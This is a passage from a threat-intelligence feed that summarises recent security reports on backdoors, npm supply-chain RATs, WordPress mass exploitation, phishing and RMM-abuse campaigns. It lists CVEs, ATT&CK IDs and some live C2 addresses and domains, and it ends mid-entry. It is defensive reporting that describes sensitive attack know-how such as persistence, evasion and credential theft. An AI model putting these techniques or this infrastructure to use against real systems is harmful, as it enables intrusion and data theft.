RST Cloud

We have started posting sample preprocessing analyses of threat reports from our Report Hub, showcasing results from one of the first stages of our multi-stage engine. If you have any suggestions for tweet format improvement, please send us a message

#threatreport #MediumCompleteness Backdoor.Mistic: New Backdoor May be Linked to Ransomware Access Broker | 24-06-2026 Source: security.com/threat-intelli… Key details below ↓ 🧑‍💻Actors/Campaigns: Dragonforce 💀Threats: Mltbackdoor, Kongtuke, Modelorat, Qilin_ransomware, Blackbasta, Interlock, Rhysida, Akira_ransomware, 8base, Clickfix_technique, Filefix_technique, Crashfix, Winpython_tool, Lolbin_technique, Nexshield, Mintsloader, Kerberoasting_technique, Anydesk_tool, Splashtop_tool, 🎯Victims: Insurance, Education, Information technology, Professional services 🏭Industry: Education 🤖LLM extracted TTPs:` T1007, T1018, T1027, T1036, T1053.005, T1059.001, T1059.005, T1059.006, T1059.007, T1069.002, ... 🧨IOCs: - File: 12 - Hash: 9 💽Software: Node.js, Curl, WordPress, Windows File Explorer, Microsoft Teams, Chrome, GateKeeper, Active Directory 🔢Algorithms: rc4 🗂️Win API: GetModuleFileNameW, LoadLibraryW 📜Programming Languages: javascript, vbscript, python, powershell #threatreport: Backdoor.Mistic is a newly identified backdoor that has been active since April 2026, primarily utilized by the cybercrime group Woodgnat, also known as KongTuke. It has been linked with various ransomware operations, particularly Qilin, and is often deployed in conjunction with ModeloRAT, a Python-based remote access trojan (RAT). The modus operandi involves opportunistic targeting across various sectors, such as insurance, education, IT, and professional services, demonstrating a wide-ranging interest in high-value organizational access rather than focusing on specific industries. The backdoor is installed through a technique known as sideloading, using a legitimate file, MpExtMs.exe, to initiate the loading of the malicious DLL named EndpointDlp.dll. This mechanism allows Mistic to evade detection by blending in with trusted software, which enhances its stealth. Once operational, the backdoor executes commands from a command and control (C2) server entirely in memory without writing files to disk, enhancing its persistence and reducing the likelihood of detection. Key capabilities of Mistic include file manipulation, command execution, and self-termination via a kill switch to maintain access covertly over time. Woodgnat's operations are predominantly characterized by the provision of initial access rather than the final delivery of malicious payloads. The group specializes in creating durable remote access for resale to ransomware affiliates, and they utilize a variety of techniques to compromise systems. Their methods include the use of social engineering tactics to trick users into executing malicious PowerShell commands, which enable further exploitation. Additionally, Woodgnat employs an array of tools such as WinPython for running the ModeloRAT, alongside Node.js, which is leveraged to execute JavaScript and chain commands. The group has also been observed using living-off-the-land techniques, leveraging built-in Windows tools like Net.exe for reconnaissance and Curl for data exfiltration. A critical aspect of their strategy involves maintaining operational resilience through multiple C2 paths and obfuscated communications, particularly for non-domain-joined victims, indicating a highly skilled approach to evading detection. The emergence of Backdoor.Mistic marks a notable trend in the evolution of cyber threats, emphasizing the use of custom-developed malware in ransomware attacks. This escalation implies a growing sophistication within the cybercriminal landscape, shifting away from reliance on dual-use tools. Woodgnat is poised as a significant threat actor to monitor, particularly in how it may adapt and innovate in collaboration with ransomware affiliates, further complicating the threat environment.

#threatreport #HighCompleteness Chinese actor compromises thousands of Wordpress sites | 23-06-2026 Source: ctrlaltintel.com/research/Wordp… Key details below ↓ 💀Threats: Godzilla_webshell, Bestshell, Meterpreter_tool, Vshell, Snowlight, 🎯Victims: Wordpress sites, Joomla sites, Prestashop sites, Metinfo sites, Craft cms sites, Magento sites, Nacos sites, Internet facing sites 🌐Geo: Chinese 🔓CVEs: CVE-2025-6389 \[[Vulners](vulners.com/cve/CVE-2025-6…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True CVE-2026-1357 \[[Vulners](vulners.com/cve/CVE-2026-1…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True CVE-2025-13486 \[[Vulners](vulners.com/cve/CVE-2025-1…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True CVE-2026-6433 \[[Vulners](vulners.com/cve/CVE-2026-6…)] - CVSS V3.1: *7.3*, - Vulners: Exploitation: Unknown CVE-2025-5394 \[[Vulners](vulners.com/cve/CVE-2025-5…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True CVE-2026-31843 \[[Vulners](vulners.com/cve/CVE-2026-3…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: Unknown CVE-2026-1969 \[[Vulners](vulners.com/cve/CVE-2026-1…)] - CVSS V3.1: *5.3*, - Vulners: Exploitation: True CVE-2026-4882 \[[Vulners](vulners.com/cve/CVE-2026-4…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: Unknown CVE-2026-0740 \[[Vulners](vulners.com/cve/CVE-2026-0…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True CVE-2025-12057 \[[Vulners](vulners.com/cve/CVE-2025-1…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True CVE-2026-3844 \[[Vulners](vulners.com/cve/CVE-2026-3…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True CVE-2025-12352 \[[Vulners](vulners.com/cve/CVE-2025-1…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: Unknown CVE-2025-23921 \[[Vulners](vulners.com/cve/CVE-2025-2…)] - CVSS V3.1: *9.0*, - Vulners: Exploitation: Unknown CVE-2025-32432 \[[Vulners](vulners.com/cve/CVE-2025-3…)] - CVSS V3.1: *10.0*, - Vulners: Exploitation: True Soft: - craftcms craft_cms (<3.9.15, <4.14.15, <5.6.17) CVE-2024-34102 \[[Vulners](vulners.com/cve/CVE-2024-3…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True Soft: - adobe commerce (2.4.2, 2.4.3, 2.4.4, 2.4.5, 2.4.6) - adobe commerce_webhooks (<1.5.0) - adobe magento (2.4.4, 2.4.5, 2.4.6, 2.4.7) CVE-2026-3300 \[[Vulners](vulners.com/cve/CVE-2026-3…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True CVE-2025-34085 \[[Vulners](vulners.com/cve/CVE-2025-3…)] - CVSS V3.1: *Unknown*, - Vulners: Exploitation: Unknown CVE-2024-6648 \[[Vulners](vulners.com/cve/CVE-2024-6…)] - CVSS V3.1: *7.5*, - Vulners: Exploitation: Unknown Soft: - apollotheme ap_pagebuilder (<4.0.0) CVE-2026-29014 \[[Vulners](vulners.com/cve/CVE-2026-2…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True Soft: - metinfo (7.9, 8.0.0, 8.1) CVE-2024-8856 \[[Vulners](vulners.com/cve/CVE-2024-8…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True Soft: - revmakx backup_and_staging_by_wp_time_capsule (<1.22.22) CVE-2024-2961 \[[Vulners](vulners.com/cve/CVE-2024-2…)] - CVSS V3.1: *7.3*, - Vulners: Exploitation: True Soft: - gnu glibc (<2.40) - netapp active_iq_unified_manager (-) - debian debian_linux (10.0) CVE-2026-48907 \[[Vulners](vulners.com/cve/CVE-2026-4…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True Soft: - widgetfactorylimited jce (<2.9.99.5) CVE-2025-7852 \[[Vulners](vulners.com/cve/CVE-2025-7…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: Unknown CVE-2025-7443 \[[Vulners](vulners.com/cve/CVE-2025-7…)] - CVSS V3.1: *8.1*, - Vulners: Exploitation: Unknown CVE-2020-25213 \[[Vulners](vulners.com/cve/CVE-2020-2…)] - CVSS V3.1: *10.0*, - Vulners: Exploitation: True Soft: - filemanagerpro file_manager (<6.9) 📚TTPs: ⚔️Tactics: 9 🛠️Technics: 16 🧨IOCs: - File: 17 - Url: 2 - Domain: 1 - IP: 2 - Hash: 9 💽Software: Wordpress, Linux, ThemeREX, BerqWP, WavePlayer, Joomla, WordPress ThemeREX, WordPress WavePlayer, WordPress BerqWP, ThinkPHP, ... 🔢Algorithms: base64, zip, md5, xor 📜Programming Languages: perl, javascript, python, php 💻Platforms: x86, x64, arm #threatreport: A mass web-exploitation operation, attributed to a Chinese actor, compromised thousands of WordPress sites in June 2026, as revealed by data exposed on the Hunt.io platform. This operation involved meticulous target acquisition, with over 850,000 recorded attempts against more than 442,000 vulnerability-site pairs, ultimately identifying 25,195 unique sites that exhibited confirmed or validated evidence of compromise. The attack primarily focused on web applications, notably WordPress plugins, leveraging identified Common Vulnerabilities and Exposures (CVEs) to gain initial access. Key vulnerabilities exploited included arbitrary file uploads and remote code execution capabilities in widely used plugins such as Breeze Cache, ThemeREX Addons, and Gravity Forms, among others, along with various content management systems like Joomla and PrestaShop. Notable CVEs included CVE-2026-48907 (Joomla JCE), CVE-2026-31843 (Pay-UZ), and CVE-2025-7852 (WPBookit), which facilitated the unauthorized exploitation of these platforms. The threat actor implemented sophisticated techniques for initial compromise, utilizing design patterns in their exploits that involved uploading malicious PHP files disguised as legitimate content (e.g., images), executing remote commands through file-handler functions, and deploying custom exploitation tools to automate the process. A variety of post-exploitation techniques were employed, including the installation of web shells and fetching attacker-controlled files. The primary web shell identified, named "down.php," demonstrated advanced capabilities for complete system control, arbitrary command execution, and extensive file management functions. Tooling leveraged by the actor included custom scripts to adjust parameters in various exploit development frameworks and exploitation routines to maximize the efficiency of their scanning processes. This involved modifications to enhance threading parameters and to refine the search patterns for detecting vulnerabilities. The actors also maintained comprehensive logs of their activities, providing insights into their operational tempo and methodologies. Attribution of the campaign rests on linguistic analysis of contained scripts, which exhibited fluent Simplified Chinese, indicating the involvement of a Chinese-speaking actor. The operational methods and toolsets suggest affiliations with groups known to deploy similar tactics. The use of FOFA for reconnaissance and the implementation of the Godzilla webshell for persistent access underscore the sophisticated nature of this attack. In summary, this cyber operation showcases the exploitation of widely-known vulnerabilities across multiple web platforms, with a clear emphasis on WordPress plugins and prominent content management systems, revealing persistent threats to web security and the need for vigilance against similar mass exploitation attempts.

#threatreport #MediumCompleteness The Growing Threat of ShadowPad Malware and Its Business Impact | 24-06-2026 Source: cyberint.com/blog/dark-web/… Key details below ↓ 🧑‍💻Actors/Campaigns: Winnti 💀Threats: Shadowpad, Plugx_rat, Supply_chain_technique, Shadowhammer, Spear-phishing_technique, Lolbin_technique, Watering_hole_technique, Dll_sideloading_technique, Passthehash_technique, Process_injection_technique, 🎯Victims: Government institutions, Critical infrastructure, High value corporate assets, Enterprise software 🏭Industry: Critical_infrastructure, Government 🌐Geo: Chinese 📚TTPs: ⚔️Tactics: 8 🛠️Technics: 20 🧨IOCs: - IP: 34 - Hash: 6 💽Software: NetSarang 🔢Algorithms: sha256 📜Programming Languages: powershell #threatreport: ShadowPad malware, initially attributed to the Chinese state-sponsored group APT41, has become a notable threat in the cybersecurity landscape due to its modular and customizable architecture. First identified in 2015 as an evolution of PlugX, ShadowPad is now utilized by various APT groups, reflecting its versatility in executing malicious operations like data exfiltration, lateral movement, and establishing backdoors into infected systems. Its modularity allows the malware to adapt to specific targets, highlighting its capability for stealth and persistence. The delivery mechanisms for ShadowPad are complex and varied, often employing sophisticated strategies designed to exploit specific vulnerabilities. It can be distributed through software supply chain attacks, wherein attackers compromise updates of legitimate applications, thus exploiting the trust users place in vendors. Additionally, the malware is utilized in conjunction with unpatched vulnerabilities within enterprise software, including zero-day exploits, which provide attackers with a gateway to infiltrate networks. Spear-phishing campaigns further facilitate the spread of ShadowPad, using well-crafted emails containing malicious links or attachments that execute the malware upon interaction. Moreover, operators utilize Living-off-the-Land (LotL) techniques by leveraging existing administrative tools and scripts, such as PowerShell and Windows Management Instrumentation (WMI), which helps avoid detection by security systems. Watering hole attacks also serve as a vehicle for distribution, targeting websites frequented by desired victims to serve the malware inadvertently. The ramifications of deploying ShadowPad can be severe for organizations, leading to significant data breaches characterized by the exfiltration of sensitive information, operational disruptions, espionage activities, and substantial financial losses. The malware’s capabilities lend themselves to stealing intellectual property and customer data, which may be used for espionage or sold on illicit markets. Furthermore, the operational impact can lead to downtime and loss of productivity, as well as the installation of additional payloads that disrupt critical systems. Organizations face the prospect of costly incident response, system recovery efforts, and potential regulatory fines for data breaches that can also incur reputational damage. The public exposure of such incidents may diminish customer trust and market value, resulting in long-term consequences for affected entities.

#threatreport #MediumCompleteness MYRA: A Full Linux RAT Distributed via npm | 23-06-2026 Source: safedep.io/malicious-apin… Key details below ↓ 💀Threats: Myra, Supply_chain_technique, Process_injection_technique, Nop_sled_technique, 🎯Victims: Software development, Linux systems, Npm users 🌐Geo: Polish 📚TTPs: ⚔️Tactics: 2 🛠️Technics: 0 🤖LLM extracted TTPs:` T1014, T1036.005, T1053.003, T1055.008, T1059.004, T1095, T1113, T1195.001, T1548.003, T1564.001, ... 🧨IOCs: - IP: 2 - Email: 1 - File: 12 💽Software: Linux, Node.js, systemd, curl, Ubuntu, sudo 🔢Algorithms: sha256, base64 🔠Functions: readFileSync, createHmac, persistStealthPreload, writeFileSync, persistStealthCron, persistStealthProfile, findDesktopProcessEnv, readProcEnviron 📜Programming Languages: javascript, python #threatreport: A full-featured Linux remote access Trojan (RAT) named MYRA has been distributed via an npm package titled "apintergrationpost." Despite the author's claimed purpose of facilitating authorized red team exercises and EDR validation, MYRA exhibits significant malicious capabilities. Upon installation, it compiles a native C rootkit, establishes three persistence mechanisms, masquerades as a legitimate system service, and manifests fileless execution. The RAT also grants interactive shell access and stream captures from the infected system. The default command and control (C2) configuration points to a private IP address (192.168.54.1), indicating a focused targeting strategy. The installation process is initiated through three npm lifecycle scripts. The 'prepare' script compiles the rootkit by generating C binaries and shared libraries essential for the RAT's evasion tactics and persistence. The 'preinstall' script forces root privileges, ensuring that the attacker has full access to system-level resources and can install necessary system dependencies. Upon successful installation, the 'postinstall' script launches the RAT in a detached background process, rendering it independently operational from npm. The MYRA RAT employs a plugin architecture with 13 modules for its C2 framework, utilizing TCP for communication and requiring HMAC-SHA256 authentication. Notably, the use of a private IP for the C2 server suggests its deployment in a defined network environment rather than using common public domains seen in typical malware distributions. The native rootkit contains sophisticated components such as 'libcache.so' for file hiding via LD_PRELOAD, 'proc_hide' for process masquerading, and 'memfd_exec' and 'memfd_loader' for executing the RAT entirely from memory, thus leaving no traces on disk. Persistence is achieved through three distinct mechanisms: the LD_PRELOAD file-hiding rootkit, a cron job that triggers every 13 minutes to run the RAT, and a login hook via profile.d that executes a wrapper script utilizing the most covert execution method available. These vectors collectively ensure that the RAT remains active even after system reboots or user intervention attempts. As the RAT was developed within a VMware environment, the codebase of MYRA includes telemetry and various MITRE ATT&CK techniques, pointing towards a scenario for red team testing rather than actual deployment into the wild. However, the publication of MYRA into a public npm registry poses grave risks, as it allows unauthorized users access to a potent toolkit that aggregates well-known evasion techniques. The combination of these sophisticated tactics within a single package presents an alarming threat landscape for defenders, reinforcing the need for cautious evaluation of npm packages before installation.

#tireport #ExtractedDiagrams The key diagram for the report (ML Classifier): schema: 1, code: 6

#threatreport #HighCompleteness An Income Tax Assessment Notice Phishing Campaign Delivering Malware | 23-06-2026 Source: cyfirma.com/research/an-in… Key details below ↓ 💀Threats: Confuserex_tool, Dll_sideloading_technique, Xworm_rat, Spear-phishing_technique, 🎯Victims: Users in india, Organizations in india 🏭Industry: Government 🌐Geo: Indian, Hong kong, China, India 📚TTPs: ⚔️Tactics: 8 🛠️Technics: 22 🧨IOCs: - Domain: 1 - File: 2 - IP: 3 - Hash: 8 🔢Algorithms: zip, sha256, md5 🔠Functions: SetAutoRun, GetWindowsVersion, GetIdleTime 🗂️Win API: DllEntry, GetSecurityInfo YARA: Found #threatreport: A recent malware campaign identified by CYFIRMA leverages a fraudulent Indian Income Tax Department-themed phishing lure to deliver a sophisticated Remote Access Trojan (RAT)-like payload. The attack primarily utilizes a phishing website hosted on the domain harivo.vip, designed to mimic authentic government communication, thus enticing victims to download malicious software masquerading as an official tax assessment notification. The lure incorporates legal language and compliance urgency to enhance its believability, prompting users to download a ZIP archive titled Tax_Assessment_0609.zip. Upon extraction, this archive reveals a malicious disk image file named Tax_Assessment.img, which contains multiple malware components including a Portable Executable (PE) file (Tax_Assessment.exe) that acts as a loader and a DLL (libsvcs.dll). Technical analysis shows that Tax_Assessment.exe employs .NET reflection to dynamically load the DLL, thereby obscuring its malicious intent and complicating static analysis attempts. Both components were obfuscated using ConfuserEx, further complicating detection and making reverse engineering challenging. The payload, libsvcs.dll, exhibits typical RAT functionalities, including methods for establishing persistent backdoor access, gathering system information, and enabling remote command execution via encrypted communications. The binary is configured to connect to a hardcoded Command-and-Control (C2) server located at 103.231.12.27:4444, utilizing an embedded 32-byte encryption key for secure communication. The threat actors behind this campaign are assessed to be financially motivated, utilizing social engineering tactics to deceive targets. The operational design reflects a structured infection methodology with multiple stages of payload delivery, maximizing flexibility while minimizing detection risks. This includes the use of misleading documents as well as techniques that hide execution behaviors and modify system registries. While the C2 infrastructure points to geolocation in Hong Kong, it is critical to note that such information does not definitively indicate the threat actors' origins, as adversaries often use compromised systems and third-party hosting to obscure their tracks. Despite the enticingly regional indicators, comprehensive attribution remains undetermined. Organizations are urged to enhance monitoring capabilities against tax-themed phishing attempts, fortify security measures around executable files, and improve detection mechanisms for suspicious behaviors associated with loader and DLL operations, particularly in response to newly observed communications and potentially malicious infrastructure.

#threatreport #MediumCompleteness From PostCSS Masquerading to Windows RAT | 23-06-2026 Source: research.jfrog.com/post/from-post… Key details below ↓ 🎯Victims: Javascript build ecosystem, Software development, Open source software ecosystem 📚TTPs: ⚔️Tactics: 3 🛠️Technics: 0 🤖LLM extracted TTPs:` T1005, T1047, T1057, T1059, T1059.001, T1059.005, T1059.007, T1071.001, T1082, T1105, ... 🧨IOCs: - File: 18 - Command: 1 - Domain: 1 - Url: 2 - IP: 1 - Hash: 6 💽Software: Chrome, curl, Nuitka, virtualbox, qemu, hyper-v, vmwaretray 🔢Algorithms: md5, aes-256-gcm, rc4, aes, gzip, zip, chacha20-poly1305 🗂️Win API: COMMAND0825INFORMATION, COMMAND0825AUTO, MSG0825LOG, NCryptOpenStorageProvider, NCryptOpenKey, NCryptDecrypt, SeDebugPrivilege 📜Programming Languages: javascript, powershell, python #threatreport: The investigation into a malicious package masquerading as the legitimate postcss-selector-parser highlights a sophisticated attack leveraging the JavaScript package ecosystem. This attack facilitates the deployment of a Windows Remote Access Trojan (RAT) that is capable of various malicious activities, including remote shell capabilities, file transfers, persistence mechanisms, host profiling, and the theft of Chrome credentials. Such obfuscation relies on the popularity of the postcss-selector-parser package, which reports over 150 million weekly downloads to social engineer unsuspecting users. The malware employs a layered architecture with dependencies on seemingly benign packages like aes-decode-runner-pro and postcss-minify-selector-parser. These packages, upon decoding, lead to a PowerShell downloader that initiates the payload chain. The end result is a downloader that fetches additional malicious components from a command-and-control (C2) infrastructure. The PowerShell script downloads a Windows payload from the domain nvidiadriver.net, extracts it to the %TEMP% directory, and executes a VBS bootstrapper, thereby further deploying the malware. Analyzing the payload reveals it operates through HTTP C2 communications, employing encrypted POST packets. It uses RC4/ARC4 for packet transport, integrating MD5 checksums for integrity. Persistence is maintained through the Windows Registry, dynamically collecting victim UUIDs and monitoring host actions, including machine checks to discern whether the malware is running in a virtual machine or a physical environment. The malware is partitioned into multiple modules, such as config.pyd, api.pyd, and audiodriver.pyd, each focusing on distinct functionalities. The command dispatcher is crucial for orchestrating operations, managing the encrypted messaging to the C2 server, and executing the requested commands. Notably, the auto.pyd module is particularly concerning as it is responsible for Chrome credential theft, referencing essential Chrome profile files and utilizing Windows decryption APIs to facilitate access to saved logins. Furthermore, the command.pyd module not only executes commands but also conducts profiling of the host environment to evade detection. It implements checks through Windows Management Instrumentation (WMI), process listings, and other indicators to ascertain if it is sandboxed within a virtualized setup. In summary, this incident illustrates a targeted package-impersonation attack that aims to exploit trust within the npm ecosystem. The real threat materializes after the initial payload is decoded, leading to robust malicious capabilities including extensive data theft and system compromise.

#threatreport #LowCompleteness Extended Rapid Response: Zimperium's On-Device Coverage of the EvilTokens Multi-Brand Phishing Campaign | 23-06-2026 Source: zimperium.com/blog/extended-… Key details below ↓ 💀Threats: Eviltokens_tool, Device_code_phishing_technique, 🎯Victims: Microsoft 365 users, Mobile users 🤖LLM extracted TTPs:` T1528, T1550.001, T1566.002, T1583.006 🔢Algorithms: aes-gcm #threatreport: The EvilTokens campaign represents a notable evolution in phishing tactics, utilizing a Phishing-as-a-Service (PhaaS) model that specifically targets users of Microsoft 365. This attack vector is marked by its sophisticated integration of device-code phishing, which allows it to operate under the guise of trusted brands like DocuSign and Adobe. Through the use of disposable Cloudflare Workers infrastructure, the campaign effectively circumvents standard security measures, making traditional static blocklisting approaches less effective against it. A critical characteristic of the EvilTokens campaign is its ability to bypass both password and multi-factor authentication (MFA). Attackers exploit the legitimate Microsoft page for device approval, enabling victims to unknowingly approve the malicious device. This approach is particularly concerning as it leverages stolen refresh tokens, granting persistent access to attackers that remains viable even after victims reset their passwords. The campaign's impact is magnified by its focus on mobile devices, which are increasingly used to open phishing links. Mobile devices typically have weaker endpoint security controls, making them more susceptible to these types of attacks. In response to these threats, Zimperium’s Mobile Threat Defense (MTD) solution has been effective in detecting and blocking the malicious URLs associated with EvilTokens at the mobile device level. This preemptive measure stops users from reaching the critical phishing step where device codes are entered. Moreover, ongoing research has led to the identification of numerous new domains associated with the EvilTokens phishing kit, indicating a broader compromise landscape. Indicators of compromise (IOCs) related to these domains are publicly accessible for further investigation, enabling organizations to strengthen their defenses against such sophisticated phishing threats.

#tireport #ExtractedDiagrams The key diagram for the report (ML Classifier): windows: 1, schema: 1

#threatreport #MediumCompleteness WhatsApp VBScript Campaign Installs ManageEngine Endpoint Central for Persistent Remote Access | 23-06-2026 Source: socradar.io/blog/whatsapp-… Key details below ↓ 💀Threats: Bitsadmin_tool, Motw_bypass_technique, Gh0st_rat, Valleyrat, 🎯Victims: Consumers, Organizations 🌐Geo: Malaysia, Spain, French, Mexico, Australia, Vietnam, Brazil, India, Taiwan, Russia, Chinese, German, Singapore, Portuguese 📚TTPs: ⚔️Tactics: 1 🛠️Technics: 0 🤖LLM extracted TTPs:` T1027, T1036, T1036.008, T1059.005, T1105, T1112, T1218.007, T1219, T1548.002, T1553.005, ... 🧨IOCs: - File: 12 - IP: 6 💽Software: WhatsApp, curl 🔢Algorithms: zip 📜Programming Languages: powershell, vbscript #threatreport: The WhatsApp VBScript campaign represents a socially engineered cyber attack wherein attackers distribute a malicious VBScript payload through hijacked WhatsApp accounts. This campaign targets a broad range of victims across multiple countries, with a notable concentration in Malaysia, which accounts for around 80% of reported incidents. The attackers seek to install ManageEngine Endpoint Central, a legitimate enterprise remote management tool, to maintain persistent control over compromised systems by exploiting the common use of WhatsApp for communication in corporate environments. The initial stage of the attack involves using obfuscation techniques to make the VBScript payload appear benign. Attackers employ localized filenames and Windows Update-themed comments to trick users into executing the scripts. The VBScript can obfuscate its operations through methods like string concatenation, encoded content, and mimicking legitimate Windows utilities such as curl or bitsadmin, which are renamed and used to fetch additional malicious payloads. In the second stage, the attack escalates as the script creates a randomized hidden directory within the system, facilitating the download of a ZIP file containing further scripts. By leveraging various methods including PowerShell and curl, the attacker extracts and executes these scripts while attempting to remove metadata that may trigger security warnings. The final stage involves the silent installation of the ManageEngine Endpoint Central agent, allowing adversaries to perform remote administration without triggering typical red flags associated with malicious binaries. Although the campaign exhibits certain characteristics that may suggest the involvement of a Chinese-speaking threat actor, no definitive attribution has been established. The presence of certain IP addresses previously linked to other malware families does not conclusively identify a single operator. This campaign raises new challenges for cybersecurity teams, as it blurs the lines between legitimate software and malicious activity, complicating detection and response efforts. Detection strategies should focus on unusual executions of wscript.exe, suspicious directory creations, and the monitoring of registry writes associated with privilege escalation. It is vital to impose network controls to block known malicious domains and scrutinize unexpected outbound connections to storage services frequently used for hosting payloads.

#threatreport #MediumCompleteness Operation FlutterBridge: The FlutterShell macOS Backdoor | 23-06-2026 Source: levelblue.com/blogs/spiderla… Key details below ↓ 🧑‍💻Actors/Campaigns: Cl-cri-1089 💀Threats: Flutterbridge, Fluttershell, Sparkle_tool, Typosquatting_technique, 🎯Victims: Macos users, Google chrome users 📚TTPs: ⚔️Tactics: 7 🛠️Technics: 12 🧨IOCs: - File: 6 - Domain: 1 - Hash: 9 💽Software: macOS, Flutter, Chrome, Google Chrome, flutter.flutter, Gatekeeper, Unix 🔢Algorithms: sha256 🔠Functions: setSparkleDelay 📜Programming Languages: javascript, objective_c 💻Platforms: apple, x86, arm #threatreport: Operation FlutterBridge has been identified as a sophisticated cyber campaign leveraging the Flutter framework to deploy macOS malware, specifically the FlutterShell backdoor. The malware operates by utilizing several Mach-O samples, demonstrating an evolution across three distinct generations. Key technical insights include its ability to maintain detection capabilities despite changes in command names and other identifiers, by separating the static binary from the command payload. At runtime, a WebView loads attacker-controlled content, allowing commands to be issued through a JavaScript message channel known as FlutterInvoke. Remarkably, the malware exhibits a conditional execution model reliant on a Command and Control (C2) server. The absence of any visible malicious behavior in the sandbox indicates that the malware remains inactive without a live C2 response. This behavior underscores the necessity for endpoint-level telemetry as the primary detection method, given that conventional behavioral sandboxes cannot simulate live C2 interactions. Further analysis reveals shared structural properties across multiple payloads, such as identical exported-symbol fingerprints and consistent architecture. The deployments utilize a two-component architecture, with a stub launcher initiating a larger dynamically linked payload library housing the Dart runtime and the malicious logic. Each payload links exclusively to system libraries like libSystem.B.dylib, bypassing standard Apple frameworks, which helps differentiate it from legitimate macOS applications. The operational strategy of the threat actor includes techniques like certificate rotation to circumvent Apple's Gatekeeper protections. Earlier generations leveraged valid Apple certificates to pass initial scrutiny, but subsequent variants have switched to self-signed artifacts for greater evasion capabilities. This approach allows the attacker to bypass revocation mechanisms effectively. The attack vector typically involves targeting users through Google/YouTube ads with keywords related to common applications, such as podcast apps or PDF converters. Victims are redirected to typosquatted domains, where they download signed app bundles that appear legitimate. Once installed, the app deceptively presents a functional interface while establishing a connection to the attacker’s domain for command execution. Specific insights also highlight payload behaviors such as attempts to modify Chrome's default search provider and suppress browser warning messages, as well as silent replacement of application bundles during update cycles. The unique attributes and operational behaviors observed in the FlutterShell malware create distinct defensive markers that can be monitored to detect anomalous activities tied to this malicious campaign.

#tireport #ExtractedDiagrams The key diagram for the report (ML Classifier): schema: 1, windows: 1, code: 10

#threatreport #MediumCompleteness A VBScript campaign distributed through WhatsApp deploying RMM software | 22-06-2026 Source: securelist.com/whatsapp-vbs-r… Key details below ↓ 💀Threats: Bitsadmin_tool, Gh0st_rat, Valleyrat, 🎯Victims: Individual users, Whatsapp users, Consumers 🏭Industry: Financial 🌐Geo: Russia, German, Taiwan, Singapore, French, Chinese, Mexico, Brazil, Vietnam, Australia, Portuguese, Malaysia, Spain, India 📚TTPs: ⚔️Tactics: 1 🛠️Technics: 0 🤖LLM extracted TTPs:` T1036, T1036.003, T1059.001, T1059.005, T1105, T1204.002, T1219, T1553.005, T1564.001, T1566.003, ... 🧨IOCs: - File: 41 - Path: 1 - IP: 6 - Hash: 41 - Domain: 8 💽Software: WhatsApp, curl 🔢Algorithms: zip 📜Programming Languages: powershell #threatreport: In June 2026, a malware campaign emerged, utilizing malicious VBScript files disseminated via WhatsApp direct messages. The campaign predominantly impacted users in Malaysia, with other affected regions including Brazil, India, Mexico, Singapore, the UK, Spain, Taiwan, Australia, Russia, and Vietnam. The primary vector for infection was WhatsApp Desktop and WhatsApp Web, where deceptive file names mimicking legitimate business documents coaxed users into executing the attachments. The VBScript triggers a multi-stage infection process culminating in the installation of Remote Monitoring and Management (RMM) software, allowing attackers remote access to the victim's system. Analysis revealed that the threat actors compromised several WhatsApp accounts, employing these stolen credentials to spread the malware through contacts. Malicious attachments were sent without additional context, increasing the likelihood of user engagement. The file names used were often financial in nature, designed to exploit social engineering vulnerabilities—examples included terms like invoices, account statements, and debt notices, localized into various languages. The initial attack stage features a VBScript that, when launched via Windows Script Host (WScript.exe), creates a working directory under C:\Users\Public\Documents. It downloads further payloads from attacker-controlled sources. Early variants of the malware employed Windows utilities such as curl.exe and bitsadmin.exe, with files renamed to resemble DLLs to minimize user detection. Additional stages see the initial script downloading two more VBScript files; one seeks to modify User Account Control (UAC) settings, while the other downloads a ZIP file containing the RMM software installation package. Each downloader creates its directory with randomized names and often applies hidden attributes to obscured content from user view. The installation process utilizes administrative privileges to ensure successful deployment of the RMM agent, indicating a sophisticated level of planning from the threat actors. Notably, the campaign’s infrastructure has shown potential links to previously identified malware such as ValleyRAT and Gh0st RAT, though definitive attribution remains uncertain. Analysis noted consistent Chinese-language comments across scripts, suggesting the involvement of a possible Chinese-speaking threat actor; however, the evidence is not robust enough for conclusive attribution. Victimology data indicates that the campaign predominantly targets individual users rather than organizations, with a broad and opportunistic approach manifested. Users are advised to exercise caution with unexpected attachments, even from recognized contacts, particularly with script or executable file types, which should only be opened after verifying their legitimacy.

#threatreport #HighCompleteness GhostShell (MB-0009): Targeting Ukraine’s UAV Operations and Defense Supply Chain | 22-06-2026 Source: blog.synapticsystems.de/ghostshell-mb-… Key details below ↓ 🧑‍💻Actors/Campaigns: Uac-0244 Gamaredon 💀Threats: Supply_chain_technique, Ghostshell, Kraken_cryptor, Mantis_botnet, Metasploit_tool, Process_injection_technique, Xray_tool, Native_loader, Vidar_stealer, Dead_drop_technique, Antidebugging_technique, Spear-phishing_technique, 🎯Victims: Ukraine, Uav operations, Drone supply chain, Military units, Technical personnel, Procurement staff, Volunteer organizations, Defense sector partners 🏭Industry: Healthcare, Military 🌐Geo: Ukraine, Kazakhstan, Ukraines, Moldova, Russia, German, Germany, Spain, Ukrainian 🔓CVEs: CVE-2025-8088 \[[Vulners](vulners.com/cve/CVE-2025-8…)] - CVSS V3.1: *8.8*, - Vulners: Exploitation: True Soft: - rarlab winrar (<7.13) CVE-2025-6218 \[[Vulners](vulners.com/cve/CVE-2025-6…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: True Soft: - rarlab winrar (<7.12) 📚TTPs: ⚔️Tactics: 7 🛠️Technics: 14 🧨IOCs: - File: 15 - Domain: 2 - Url: 7 - Hash: 17 - IP: 6 - Path: 1 💽Software: WinHTTP, Windows Security, Telegram, Discord, Steam, Outlook, 